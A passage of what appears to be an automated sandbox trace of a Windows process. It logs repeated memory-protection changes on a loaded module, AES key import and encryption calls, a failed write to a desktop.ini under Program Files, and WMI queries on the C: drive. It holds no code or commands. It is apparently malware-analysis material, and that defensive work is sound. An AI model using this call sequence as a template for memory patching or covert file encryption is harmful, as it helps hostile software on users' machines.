BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x4) returned 0x0 [0139.344] GetCurrentProcess () returned 0xffffffff [0139.344] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x777117c8, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x4, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x20) returned 0x0 [0139.344] GetCurrentProcess () returned 0xffffffff [0139.344] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x777117c8, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x20, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x4) returned 0x0 [0139.344] GetCurrentProcess () returned 0xffffffff [0139.344] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x777117d0, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x4, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x20) returned 0x0 [0139.345] GetCurrentProcess () returned 0xffffffff [0139.345] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x777117d0, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x20, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x4) returned 0x0 [0139.345] GetCurrentProcess () returned 0xffffffff [0139.345] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x7771180c, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x4, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x20) returned 0x0 [0139.346] GetCurrentProcess () returned 0xffffffff [0139.346] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x7771180c, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x20, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x4) returned 0x0 [0139.346] GetCurrentProcess () returned 0xffffffff [0139.346] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x7771182c, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x4, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x20) returned 0x0 [0139.347] GetCurrentProcess () returned 0xffffffff [0139.347] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x7771182c, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x20, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x4) returned 0x0 [0139.347] GetCurrentProcess () returned 0xffffffff [0139.347] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x77711860, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x4, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x20) returned 0x0 [0139.348] GetCurrentProcess () returned 0xffffffff [0139.348] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6cee080*=0x77711860, NumberOfBytesToProtect=0x6cee084, NewAccessProtection=0x20, OldAccessProtection=0x6cee0b8 | out: BaseAddress=0x6cee080*=0x77711000, NumberOfBytesToProtect=0x6cee084, OldAccessProtection=0x6cee0b8*=0x4) returned 0x0 [0139.348] SetLastError (dwErrCode=0x0) [0139.349] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContext") returned 0x0 [0139.349] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0139.349] CryptAcquireContextW (in: phProv=0x6ceecdc, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ceecdc*=0x6ee960) returned 1 [0139.371] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.371] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.371] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x1 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.389] CoTaskMemFree (pv=0x7acf98) [0139.389] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.389] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.389] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.389] CoTaskMemFree (pv=0x7acf98) [0139.389] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.389] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.389] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.389] CoTaskMemFree (pv=0x7acf98) [0139.389] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.390] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.390] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.390] CoTaskMemFree (pv=0x7acf98) [0139.390] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.390] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.390] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.390] CoTaskMemFree (pv=0x7acf98) [0139.390] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.390] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.390] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.390] CoTaskMemFree (pv=0x7acf98) [0139.390] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.390] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.390] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.390] CoTaskMemFree (pv=0x7acf98) [0139.390] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.390] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.390] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.390] CoTaskMemFree (pv=0x7acf98) [0139.390] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.391] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.391] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.391] CoTaskMemFree (pv=0x7acf98) [0139.391] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.391] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.391] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.391] CoTaskMemFree (pv=0x7acf98) [0139.391] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.391] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.391] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.391] CoTaskMemFree (pv=0x7acf98) [0139.391] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.391] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.391] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.391] CoTaskMemFree (pv=0x7acf98) [0139.391] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.391] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.391] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.392] CoTaskMemFree (pv=0x7acf98) [0139.392] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.392] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.392] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.392] CoTaskMemFree (pv=0x7acf98) [0139.392] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.392] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.392] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.392] CoTaskMemFree (pv=0x7acf98) [0139.392] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.392] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.392] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.392] CoTaskMemFree (pv=0x7acf98) [0139.392] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.392] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.392] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.392] CoTaskMemFree (pv=0x7acf98) [0139.392] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.393] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.393] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.393] CoTaskMemFree (pv=0x7acf98) [0139.393] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.393] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.393] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.393] CoTaskMemFree (pv=0x7acf98) [0139.393] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 1 [0139.393] CoTaskMemAlloc (cb=0x20) returned 0x7acf98 [0139.393] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x7acf98, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x7acf98, pdwDataLen=0x6ceeca0) returned 1 [0139.393] CoTaskMemFree (pv=0x7acf98) [0139.393] CryptGetProvParam (in: hProv=0x6ee960, dwParam=0x1, pbData=0x0, pdwDataLen=0x6ceeca0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x6ceeca0) returned 0 [0141.806] CryptGenRandom (in: hProv=0x6ee960, dwLen=0x10, pbBuffer=0x33b6844 | out: pbBuffer=0x33b6844) returned 1 [0145.085] CryptImportKey (in: hProv=0x6ee960, pbData=0x34632a0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6ceecac | out: phKey=0x6ceecac*=0x77b370) returned 1 [0145.085] CryptContextAddRef (hProv=0x6ee960, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.085] CryptContextAddRef (hProv=0x6ee960, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.085] CryptDuplicateKey (in: hKey=0x77b370, pdwReserved=0x0, dwFlags=0x0, phKey=0x6ceec9c | out: phKey=0x6ceec9c*=0x77b3b0) returned 1 [0145.085] CryptContextAddRef (hProv=0x6ee960, pdwReserved=0x0, dwFlags=0x0) returned 1 [0145.085] CryptSetKeyParam (hKey=0x77b3b0, dwParam=0x4, pbData=0x3463380*=0x1, dwFlags=0x0) returned 1 [0145.085] CryptSetKeyParam (hKey=0x77b3b0, dwParam=0x1, pbData=0x346334c, dwFlags=0x0) returned 1 [0145.085] CryptEncrypt (in: hKey=0x77b3b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3463390*, pdwDataLen=0x6ceed08*=0xb0, dwBufLen=0xb0 | out: pbData=0x3463390*, pdwDataLen=0x6ceed08*=0xb0) returned 1 [0145.086] CryptEncrypt (in: hKey=0x77b3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3463464*, pdwDataLen=0x6ceed10*=0x0, dwBufLen=0x10 | out: pbData=0x3463464*, pdwDataLen=0x6ceed10*=0x10) returned 1 [0146.795] CryptDestroyKey (hKey=0x77b370) returned 1 [0146.795] CryptReleaseContext (hProv=0x6ee960, dwFlags=0x0) returned 1 [0146.795] CryptReleaseContext (hProv=0x6ee960, dwFlags=0x0) returned 1 [0146.795] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\desktop.ini", nBufferLength=0x105, lpBuffer=0x6cee780, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\desktop.ini", lpFilePart=0x0) returned 0x22 [0146.795] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6ceec74) returned 1 [0146.795] CreateFileW (lpFileName="C:\\Program Files (x86)\\desktop.ini" (normalized: "c:\\program files (x86)\\desktop.ini"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0148.093] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6cedab0) returned 1 [0148.093] CoTaskMemAlloc (cb=0x20c) returned 0x7bf268 [0148.093] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7bf268 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0148.093] CoTaskMemFree (pv=0x7bf268) [0148.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6cee768, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0148.093] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceecb0 | out: ppv=0x6ceecb0*=0x72015c) returned 0x0 [0148.093] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceeca8 | out: pAptType=0x6ceeca8*=1) returned 0x0 [0148.093] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceecac | out: ppvObject=0x6ceecac*=0x0) returned 0x80004002 [0148.093] IUnknown:Release (This=0x72015c) returned 0x1 [0148.094] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee618 | out: ppv=0x6cee618*=0x6736de8) returned 0x0 [0148.094] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736de8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6cee830 | out: ppvObject=0x6cee830*=0x0) returned 0x80004002 [0148.094] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736de8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee844 | out: ppvObject=0x6cee844*=0x67382a0) returned 0x0 [0148.094] WbemDefPath:IUnknown:Release (This=0x6736de8) returned 0x0 [0148.094] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee464 | out: ppvObject=0x6cee464*=0x67382a0) returned 0x0 [0148.095] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6cee420 | out: ppvObject=0x6cee420*=0x0) returned 0x80004002 [0148.095] WbemDefPath:IUnknown:AddRef (This=0x67382a0) returned 0x3 [0148.095] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6cedd7c | out: ppvObject=0x6cedd7c*=0x0) returned 0x80004002 [0148.095] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6cedd2c | out: ppvObject=0x6cedd2c*=0x0) returned 0x80004002 [0148.095] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cedd38 | out: ppvObject=0x6cedd38*=0x77dc68) returned 0x0 [0148.095] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dc68, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6cedd40 | out: pCid=0x6cedd40*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.095] WbemDefPath:IUnknown:Release (This=0x77dc68) returned 0x3 [0148.095] CoGetContextToken (in: pToken=0x6cedd98 | out: pToken=0x6cedd98) returned 0x0 [0148.095] CoGetContextToken (in: pToken=0x6cee1a0 | out: pToken=0x6cee1a0) returned 0x0 [0148.095] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6cee230 | out: ppvObject=0x6cee230*=0x0) returned 0x80004002 [0148.096] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x2 [0148.096] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x1 [0148.096] CoGetContextToken (in: pToken=0x6ceeb28 | out: pToken=0x6ceeb28) returned 0x0 [0148.096] CoGetContextToken (in: pToken=0x6ceea88 | out: pToken=0x6ceea88) returned 0x0 [0148.096] WbemDefPath:IUnknown:QueryInterface (in: This=0x67382a0, riid=0x6ceeb58*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ceeb54 | out: ppvObject=0x6ceeb54*=0x67382a0) returned 0x0 [0148.096] WbemDefPath:IUnknown:AddRef (This=0x67382a0) returned 0x3 [0148.096] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x2 [0148.096] WbemDefPath:IWbemPath:SetText (This=0x67382a0, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.096] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67382a0, puCount=0x6ceecdc | out: puCount=0x6ceecdc*=0x0) returned 0x0 [0148.096] WbemDefPath:IWbemPath:GetText (in: This=0x67382a0, lFlags=2, puBuffLength=0x6ceecd8*=0x0, pszText=0x0 | out: puBuffLength=0x6ceecd8*=0x20, pszText=0x0) returned 0x0 [0148.096] WbemDefPath:IWbemPath:GetText (in: This=0x67382a0, lFlags=2, puBuffLength=0x6ceecd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ceecd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.096] WbemDefPath:IWbemPath:GetInfo (in: This=0x67382a0, uRequestedInfo=0x0, puResponse=0x6ceece4 | out: puResponse=0x6ceece4*=0xc19) returned 0x0 [0148.096] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67382a0, puCount=0x6ceecdc | out: puCount=0x6ceecdc*=0x0) returned 0x0 [0148.096] WbemDefPath:IWbemPath:GetInfo (in: This=0x67382a0, uRequestedInfo=0x0, puResponse=0x6ceece4 | out: puResponse=0x6ceece4*=0xc19) returned 0x0 [0148.096] WbemDefPath:IWbemPath:GetInfo (in: This=0x67382a0, uRequestedInfo=0x0, puResponse=0x6ceece4 | out: puResponse=0x6ceece4*=0xc19) returned 0x0 [0148.097] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67382a0, puCount=0x6ceec5c | out: puCount=0x6ceec5c*=0x0) returned 0x0 [0148.097] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6ceec48 | out: puCount=0x6ceec48*=0x2) returned 0x0 [0148.097] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceec44*=0x0, pszText=0x0 | out: puBuffLength=0x6ceec44*=0xf, pszText=0x0) returned 0x0 [0148.097] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6ceec44*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ceec44*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.097] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ceebf8 | out: ppv=0x6ceebf8*=0x72015c) returned 0x0 [0148.097] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6ceebf0 | out: pAptType=0x6ceebf0*=1) returned 0x0 [0148.097] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6ceebf4 | out: ppvObject=0x6ceebf4*=0x0) returned 0x80004002 [0148.097] IUnknown:Release (This=0x72015c) returned 0x1 [0148.098] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6cee560 | out: ppv=0x6cee560*=0x6736dc8) returned 0x0 [0148.098] 